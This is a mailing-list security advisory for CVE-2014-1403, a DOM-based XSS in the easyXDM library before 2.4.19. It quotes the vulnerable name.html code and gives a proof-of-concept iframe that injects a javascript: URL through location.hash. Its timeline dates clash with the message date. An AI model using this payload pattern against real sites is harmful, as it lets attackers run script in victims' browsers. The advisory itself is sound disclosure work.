[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [Full-disclosure] [CVE-2014-1403] DOM XSS in EasyXDM 2.4.18
From: Krzysztof Kotowicz <kkotowicz+fd () gmail ! com>
Date: 2014-01-31 21:24:10
Message-ID: CABAEwV-im-P9p-5rCM=xHcddWXfrgi25wqcL8FxepT1FWhHLdw () mail ! gmail ! com
[Download RAW message or body]
[Attachment #2 (multipart/alternative)]
Affected products
=================
easyXDM library < 2.4.19 - http://easyxdm.net/wp/
easyXDM is a Javascript library that enables you as a developer to easily
work around the limitation set in place by the Same Origin Policy, in turn
making it easy to communicate and expose javascript API's across domain
boundaries.
Vulnerabilities are fixed in version 2.4.19. All users are advised to
upgrade.
CVE
===
CVE-2014-1403
DOM XSS in name.html location.hash value
========================================
Description
-----------
EasyXDM uses name.html file to bootstrap cross origin communication
between documents. It accepts various parameters in location.hash value,
one of which is the URL of the document to load. Value of this parameter
is not filtered, allowing to pass javascript: URL that may execute
arbitrary Javascript code in context of the domain hosting EasyXDM
installation.
This vulnerability is described in greater details in [1]
Analysis
--------
The root cause of the vulnerability is the following code in name.html
file:
if (location.hash) { // DOM XSS source
if (location.hash.substring(1, 2) === "_") {
var channel, url,
hash = location.href.substring(location.href.indexOf("#") + 3),
indexOf = hash.indexOf(",");
if (indexOf == -1) {
channel = hash;
}
else {
channel = hash.substring(0, indexOf);
url = decodeURIComponent(hash.substring(indexOf + 1));
}
switch (location.hash.substring(2, 3)) {
/...
case "3":
// NameTransport remote
var guest = window.parent.frames[
"easyXDM_" + channel + "_provider"
];
if (!guest) {
throw new Error("unable to reference window");
}
guest.easyXDM.Fn.get(channel)(window.name);
location.href = url + "#_4" + channel + ","; // DOM XSS sink
break;
Part of location hash, under certain conditions, ends up in location.href
assignment, triggering JS execution.
Proof of Concept
----------------
<iframe id=f></iframe> <iframe name="easyXDM_constructor_provider"
src="http://domain/example/bridge.html" onload="document.getElementById('f'
).src=
'http://domain/name.html#_3constructor,javascript:alert(document.domain)//'
;"> </iframe>
Credits
=======
Vulnerability found by Krzysztof Kotowicz <kkotowicz at cure53.de>
http://blog.kotowicz.net
Timeline
========
- 2013-01-xx - Discovery
- 2013-01-10 - Notified project maintainer
- 2013-01-19 - Fixed version release
- 2013-01-31 - Public disclosure
Related links
=============
[1]
http://blog.kotowicz.net/2014/01/xssing-with-shakespeare-name-calling.html
[Attachment #5 (text/html)]
<div dir="ltr"><div>Affected products</div><div>=================</div><div>easyXDM library \
< 2.4.19 - <a href="http://easyxdm.net/wp/">http://easyxdm.net/wp/</a></div><div><br></div><div>easyXDM \
is a Javascript library that enables you as a developer to easily </div>
<div>work around the limitation set in place by the Same Origin Policy, in \
turn </div><div>making it easy to communicate and expose javascript API’s across \
domain </div><div>boundaries.</div><div><br></div><div>Vulnerabilities are fixed in \
version 2.4.19. All users are advised to </div>
<div>upgrade.</div><div><br></div><div>CVE</div><div>===</div><div>CVE-2014-1403</div><div><br></div><div>DOM \
XSS in name.html location.hash \
value</div><div>========================================</div><div><br></div><div>
Description </div><div>-----------</div><div>EasyXDM uses name.html file to bootstrap \
cross origin communication </div><div>between documents. It accepts various parameters in \
location.hash value, </div><div>one of which is the URL of the document to load. Value of \
this parameter </div>
<div>is not filtered, allowing to pass javascript: URL that may \
execute </div><div>arbitrary Javascript code in context of the domain hosting \
EasyXDM </div><div>installation.</div><div><br></div><div>This vulnerability is described \
in greater details in [1]</div>
<div><br></div><div>Analysis</div><div>--------</div><div>The root cause of the vulnerability \
is the following code in name.html </div><div>file:</div><div><br></div><div> \
if (location.hash) { // DOM XSS source</div><div>
if (location.hash.substring(1, 2) === "_") {</div><div> \
var channel, url, </div><div> hash \
= location.href.substring(location.href.indexOf("#") + 3), </div><div> \
indexOf = hash.indexOf(",");</div>
<div> if (indexOf == -1) {</div><div> \
channel = hash;</div><div> }</div><div> \
else {</div><div> channel = hash.substring(0, \
indexOf);</div><div> url = \
decodeURIComponent(hash.substring(indexOf + 1));</div>
<div> }</div><div> switch \
(location.hash.substring(2, 3)) {</div><div> \
/...</div><div> case "3":</div><div> \
// NameTransport remote</div><div> \
var guest = window.parent.frames[</div>
<div> "easyXDM_" + channel + \
"_provider"</div><div> \
];</div><div> if (!guest) {</div><div> \
throw new Error("unable to reference \
window");</div>
<div> }</div><div> \
guest.easyXDM.Fn.get(channel)(<a \
href="http://window.name">window.name</a>); </div><div> \
location.href = url + "#_4" + channel + ","; // DOM XSS sink</div>
<div> break;</div><div><br></div><div>Part of location \
hash, under certain conditions, ends up in location.href </div><div>assignment, triggering \
JS execution.</div><div><br></div><div>Proof of Concept</div><div>
----------------</div><div><br></div><div><iframe id=f></iframe> <iframe \
name="easyXDM_constructor_provider"</div><div>src="<a \
href="http://domain/example/bridge.html">http://domain/example/bridge.html</a>" \
onload="document.getElementById('f'</div>
<div>).src=</div><div>'<a \
href="http://domain/name.html#_3constructor,javascript:alert(document.domain)//">http://domain/n \
ame.html#_3constructor,javascript:alert(document.domain)//</a>'</div><div>;"> \
</iframe></div>
<div><br></div><div>Credits</div><div>=======</div><div>Vulnerability found by Krzysztof \
Kotowicz <kkotowicz at <a href="http://cure53.de">cure53.de</a>></div><div><a \
href="http://blog.kotowicz.net">http://blog.kotowicz.net</a></div>
<div><br></div><div>Timeline</div><div>======== </div><div> - 2013-01-xx - \
Discovery</div><div> - 2013-01-10 - Notified project maintainer </div><div> - \
2013-01-19 - Fixed version release</div><div> - 2013-01-31 - Public disclosure</div>
<div><br></div><div>Related links</div><div>=============</div><div>[1] <a \
href="http://blog.kotowicz.net/2014/01/xssing-with-shakespeare-name-calling.html">http://blog.kotowicz.net/2014/01/xssing-with-shakespeare-name-calling.html</a></div>
<div><br></div></div>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic